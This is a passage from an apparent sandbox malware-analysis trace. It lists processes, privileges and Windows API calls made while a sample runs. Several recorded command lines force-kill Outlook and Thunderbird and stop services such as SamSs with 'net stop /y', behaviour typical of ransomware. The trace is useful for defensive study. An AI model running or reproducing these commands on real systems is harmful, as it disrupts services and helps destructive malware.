returned 18 [0151.287] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0151.287] _wcsicmp (_String1="SAMSS", _String2="UPS") returned -2 [0151.287] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0151.287] _wcsicmp (_String1="SAMSS", _String2="XACTSRV") returned -5 [0151.287] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0151.287] _wcsicmp (_String1="SAMSS", _String2="TCPIP") returned -1 [0151.287] wcsncpy_s (in: _Destination=0x31204a4, _SizeInWords=0x6, _Source="SAMSS", _MaxCount=0x5 | out: _Destination="SAMSS") returned 0x0 [0151.287] wcsncpy_s (in: _Destination=0x3120498, _SizeInWords=0x6, _Source="SAMSS", _MaxCount=0x5 | out: _Destination="SAMSS") returned 0x0 [0151.287] NetApiBufferFree (Buffer=0x3114468) returned 0x0 [0151.287] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x2bcf81c | out: Buffer=0x2bcf81c*=0x3121ff0) returned 0x0 [0151.287] OpenServiceW (hSCManager=0x3120670, lpServiceName="SAMSS", dwDesiredAccess=0xc) returned 0x3120878 [0151.288] QueryServiceStatus (in: hService=0x3120878, lpServiceStatus=0x2bcf820 | out: lpServiceStatus=0x2bcf820*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0151.288] NetApiBufferFree (Buffer=0x3121ff0) returned 0x0 [0151.288] CloseServiceHandle (hSCObject=0x3120878) returned 1 [0151.288] wcscpy_s (in: _Destination=0x2c7610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0151.288] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x2f10002 [0151.289] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x2f10002, dwMessageId=0x88f, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The requested pause, continue, or stop is not valid for this service.\r\n") returned 0x47 [0151.290] GetFileType (hFile=0x94) returned 0x2 [0151.290] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x2bcf758 | out: lpMode=0x2bcf758) returned 1 [0151.584] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x2bcf764, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x2bcf764*=0x47) returned 1 [0151.807] GetFileType (hFile=0x94) returned 0x2 [0151.807] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x2bcf758 | out: lpMode=0x2bcf758) returned 1 [0152.070] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2bcf764, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x2bcf764*=0x2) returned 1 [0152.366] _ultow (in: _Dest=0x88f, _Radix=45938604 | out: _Dest=0x88f) returned="2191" [0152.366] FormatMessageW (in: dwFlags=0x2800, lpSource=0x2f10002, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="More help is available by typing NET HELPMSG 2191.\r\n") returned 0x34 [0152.366] GetFileType (hFile=0x94) returned 0x2 [0152.366] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x2bcf77c | out: lpMode=0x2bcf77c) returned 1 [0152.630] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x2bcf788, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x2bcf788*=0x34) returned 1 [0153.258] GetFileType (hFile=0x94) returned 0x2 [0153.258] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x2bcf77c | out: lpMode=0x2bcf77c) returned 1 [0153.595] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2bcf788, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x2bcf788*=0x2) returned 1 [0153.955] NetApiBufferFree (Buffer=0x3118380) returned 0x0 [0153.955] NetApiBufferFree (Buffer=0x3118398) returned 0x0 [0153.955] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"samss\" /y" [0153.955] exit (_Code=2) Thread: id = 929 os_tid = 0x1dc4 Process: id = "31" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x50e59000" os_pid = "0x3e8" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x24c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xa], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b8a3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 2114 os_tid = 0x1928 Thread: id = 2115 os_tid = 0x1218 Thread: id = 2116 os_tid = 0x12d8 Thread: id = 2117 os_tid = 0x12cc Thread: id = 2118 os_tid = 0x1160 Thread: id = 2119 os_tid = 0x1044 Thread: id = 2120 os_tid = 0xf28 Thread: id = 2121 os_tid = 0x6cc Thread: id = 2122 os_tid = 0x5bc Thread: id = 2123 os_tid = 0x54c Thread: id = 2124 os_tid = 0x738 Thread: id = 2125 os_tid = 0x6d0 Thread: id = 2126 os_tid = 0xb80 Thread: id = 2127 os_tid = 0xd14 Thread: id = 2128 os_tid = 0xe24 Thread: id = 2129 os_tid = 0xc24 Thread: id = 2130 os_tid = 0xabc Thread: id = 2131 os_tid = 0x2d8 Thread: id = 2132 os_tid = 0x7a8 Thread: id = 2133 os_tid = 0xd34 Thread: id = 2134 os_tid = 0xd68 Thread: id = 2135 os_tid = 0xdc4 Thread: id = 2136 os_tid = 0xb88 Thread: id = 2137 os_tid = 0xd80 Thread: id = 2138 os_tid = 0xd30 Thread: id = 2139 os_tid = 0xd94 Thread: id = 2140 os_tid = 0xd84 Thread: id = 2141 os_tid = 0x438 Thread: id = 2142 os_tid = 0x494 Thread: id = 2143 os_tid = 0x490 Thread: id = 2144 os_tid = 0x49c Thread: id = 2145 os_tid = 0xf8c Thread: id = 2146 os_tid = 0xf88 Thread: id = 2147 os_tid = 0xf84 Thread: id = 2148 os_tid = 0xf80 Thread: id = 2149 os_tid = 0xf78 Thread: id = 2150 os_tid = 0xf74 Thread: id = 2151 os_tid = 0xf5c Thread: id = 2152 os_tid = 0xf54 Thread: id = 2153 os_tid = 0xb68 Thread: id = 2154 os_tid = 0xab8 Thread: id = 2155 os_tid = 0xab4 Thread: id = 2156 os_tid = 0xa9c Thread: id = 2157 os_tid = 0xa98 Thread: id = 2158 os_tid = 0xa94 Thread: id = 2159 os_tid = 0xa7c Thread: id = 2160 os_tid = 0xa08 Thread: id = 2161 os_tid = 0x9fc Thread: id = 2162 os_tid = 0x9f4 Thread: id = 2163 os_tid = 0x9d4 Thread: id = 2164 os_tid = 0x9cc Thread: id = 2165 os_tid = 0x9c4 Thread: id = 2166 os_tid = 0x99c Thread: id = 2167 os_tid = 0x990 Thread: id = 2168 os_tid = 0x980 Thread: id = 2169 os_tid = 0x978 Thread: id = 2170 os_tid = 0x970 Thread: id = 2171 os_tid = 0x92c Thread: id = 2172 os_tid = 0x8dc Thread: id = 2173 os_tid = 0x8b0 Thread: id = 2174 os_tid = 0x4c8 Thread: id = 2175 os_tid = 0x7e0 Thread: id = 2176 os_tid = 0x7dc Thread: id = 2177 os_tid = 0x7d8 Thread: id = 2178 os_tid = 0x7cc Thread: id = 2179 os_tid = 0x79c Thread: id = 2180 os_tid = 0x798 Thread: id = 2181 os_tid = 0x794 Thread: id = 2182 os_tid = 0x708 Thread: id = 2183 os_tid = 0x700 Thread: id = 2184 os_tid = 0x6f8 Thread: id = 2185 os_tid = 0x6f4 Thread: id = 2186 os_tid = 0x6f0 Thread: id = 2187 os_tid = 0x6ec Thread: id = 2188 os_tid = 0x6d8 Thread: id = 2189 os_tid = 0x6b0 Thread: id = 2190 os_tid = 0x680 Thread: id = 2191 os_tid = 0x630 Thread: id = 2192 os_tid = 0x600 Thread: id = 2193 os_tid = 0x58c Thread: id = 2194 os_tid = 0x584 Thread: id = 2195 os_tid = 0x560 Thread: id = 2196 os_tid = 0x528 Thread: id = 2197 os_tid = 0x520 Thread: id = 2198 os_tid = 0x518 Thread: id = 2199 os_tid = 0x424 Thread: id = 2200 os_tid = 0x418 Thread: id = 2201 os_tid = 0x408 Thread: id = 2202 os_tid = 0x404 Thread: id = 2203 os_tid = 0x2a8 Thread: id = 2204 os_tid = 0x180 Thread: id = 2205 os_tid = 0x190 Thread: id = 2206 os_tid = 0x348 Thread: id = 2207 os_tid = 0x34c Thread: id = 2208 os_tid = 0x32c Thread: id = 2209 os_tid = 0x304 Thread: id = 2210 os_tid = 0x244 Thread: id = 2211 os_tid = 0x2a4 Thread: id = 2212 os_tid = 0x2b8 Thread: id = 2213 os_tid = 0x3ec Thread: id = 2215 os_tid = 0x2fd4 Thread: id = 2216 os_tid = 0x2fd8 Thread: id = 2218 os_tid = 0x2fe4 Thread: id = 2219 os_tid = 0x2fe8 Thread: id = 2220 os_tid = 0x2fec Thread: id = 4479 os_tid = 0x5318 Thread: id = 4538 os_tid = 0x5408 Thread: id = 4539 os_tid = 0x540c Thread: id = 4540 os_tid = 0x5410 Thread: id = 9634 os_tid = 0xa200 Thread: id = 9937 os_tid = 0xa6c4 Thread: id = 11155 os_tid = 0xb9bc Thread: id = 11156 os_tid = 0xb9c0 Process: id = "32" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x738af000" os_pid = "0x5778" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM outlook.exe /F" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4757 os_tid = 0x577c Thread: id = 5148 os_tid = 0x5d58 Thread: id = 6792 os_tid = 0x7698 Thread: id = 6800 os_tid = 0x76b8 Thread: id = 6801 os_tid = 0x76bc Process: id = "33" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x1dc1c000" os_pid = "0x3170" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "31" os_parent_pid = "0x2bc" cmd_line = "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000a99bd" [0xc000000f] Thread: id = 4798 os_tid = 0x5314 Thread: id = 4799 os_tid = 0x521c Thread: id = 4800 os_tid = 0x5158 Thread: id = 4801 os_tid = 0x4cb8 Thread: id = 4802 os_tid = 0x31b8 Thread: id = 4803 os_tid = 0x3174 Thread: id = 4812 os_tid = 0x5820 Thread: id = 4980 os_tid = 0x5ac0 Thread: id = 4982 os_tid = 0x5acc Thread: id = 5455 os_tid = 0x61f8 Thread: id = 6802 os_tid = 0x76c0 Thread: id = 11969 os_tid = 0xc680 Thread: id = 12138 os_tid = 0xc928 Thread: id = 12655 os_tid = 0xd144 Thread: id = 13456 os_tid = 0xdcdc Thread: id = 13494 os_tid = 0xdd74 Thread: id = 13570 os_tid = 0xdea8 Process: id = "34" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x4e208000" os_pid = "0x56c" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "31" os_parent_pid = "0x2bc" cmd_line = "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xe], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b8a3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 4804 os_tid = 0xd8c Thread: id = 4805 os_tid = 0xd40 Thread: id = 4806 os_tid = 0xd48 Thread: id = 4807 os_tid = 0xd60 Thread: id = 4808 os_tid = 0xd58 Thread: id = 4809 os_tid = 0xd54 Thread: id = 4810 os_tid = 0xd44 Thread: id = 4811 os_tid = 0xd50 Process: id = "35" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x74850000" os_pid = "0x5824" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x5778" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4813 os_tid = 0x5828 Thread: id = 4846 os_tid = 0x58ac Thread: id = 4944 os_tid = 0x5a30 Thread: id = 4983 os_tid = 0x5ad0 Thread: id = 5019 os_tid = 0x5b60 Process: id = "36" image_name = "wmiprvse.exe" filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe" page_root = "0x73e28000" os_pid = "0x5ac4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "31" os_parent_pid = "0x2bc" cmd_line = "C:\\WINDOWS\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000ae47b" [0xc000000f] Thread: id = 4981 os_tid = 0x5ac8 Thread: id = 5020 os_tid = 0x5b68 Thread: id = 6322 os_tid = 0x6f54 Thread: id = 6691 os_tid = 0x7500 Thread: id = 6744 os_tid = 0x75d4 Thread: id = 6745 os_tid = 0x75dc Thread: id = 9741 os_tid = 0xa3ac Thread: id = 9788 os_tid = 0xa46c Thread: id = 9832 os_tid = 0xa520 Thread: id = 12654 os_tid = 0xd13c Process: id = "37" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x59a35000" os_pid = "0x6024" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM thunderbird.exe /F" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 5340 os_tid = 0x6028 Thread: id = 5876 os_tid = 0x6854 Thread: id = 6919 os_tid = 0x7848 Thread: id = 7024 os_tid = 0x79f0 Thread: id = 7026 os_tid = 0x79f8 Process: id = "38" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x404b1000" os_pid = "0x61f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x6024" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 5454 os_tid = 0x61f4 Thread: id = 5513 os_tid = 0x62e4 Thread: id = 5648 os_tid = 0x64d4 Thread: id = 5778 os_tid = 0x66dc Thread: id = 5855 os_tid = 0x6804 Process: id = "39" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2e810000" os_pid = "0x6cdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"audioendpointbuilder\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6170 os_tid = 0x6ce0 Thread: id = 6693 os_tid = 0x7508 Process: id = "40" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x1a395000" os_pid = "0x6ce4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM outlook.exe /F" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6171 os_tid = 0x6ce8 Thread: id = 6786 os_tid = 0x767c Thread: id = 7428 os_tid = 0x8018 Thread: id = 7533 os_tid = 0x81c0 Thread: id = 7593 os_tid = 0x82b8 Process: id = "41" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1089000" os_pid = "0x6db0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x6cdc" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6219 os_tid = 0x6db4 Thread: id = 6260 os_tid = 0x6e5c Thread: id = 6323 os_tid = 0x6f58 Thread: id = 6515 os_tid = 0x7248 Thread: id = 6582 os_tid = 0x7354 Process: id = "42" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6615e000" os_pid = "0x6db8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x6ce4" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6220 os_tid = 0x6dbc Thread: id = 6261 os_tid = 0x6e60 Thread: id = 6442 os_tid = 0x7124 Thread: id = 6640 os_tid = 0x7434 Thread: id = 6692 os_tid = 0x7504 Process: id = "43" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x74989000" os_pid = "0x7690" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x6cdc" cmd_line = "C:\\WINDOWS\\system32\\net1 stop \"audioendpointbuilder\" /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6791 os_tid = 0x7694 [0208.427] GetModuleHandleA (lpModuleName=0x0) returned 0x2a0000 [0208.427] __set_app_type (_Type=0x1) [0208.427] __p__fmode () returned 0x76953c14 [0208.427] __p__commode () returned 0x769549ec [0208.427] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2a6f20) returned 0x0 [0208.427] __getmainargs (in: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610, _DoWildCard=0, _StartInfo=0x2bf61c | out: _Argc=0x2bf608, _Argv=0x2bf60c, _Env=0x2bf610) returned 0 [0208.427] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0208.427] GetConsoleOutputCP () returned 0x1b5 [0208.600] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x2c6fa0 | out: lpCPInfo=0x2c6fa0) returned 1 [0208.600] SetThreadUILanguage (LangId=0x0) returned 0x25c0409 [0208.758] sprintf_s (in: _DstBuf=0x1afd10, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0208.758] setlocale (category=0, locale=".437") returned="English_United States.437" [0208.760] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0208.760] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0208.760] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"audioendpointbuilder\" /y" [0208.760] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1afab8, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0208.760] RtlAllocateHeap (HeapHandle=0x2950000, Flags=0x0, Size=0x7c) returned 0x2954450 [0208.760] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0208.760] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1afab4 | out: 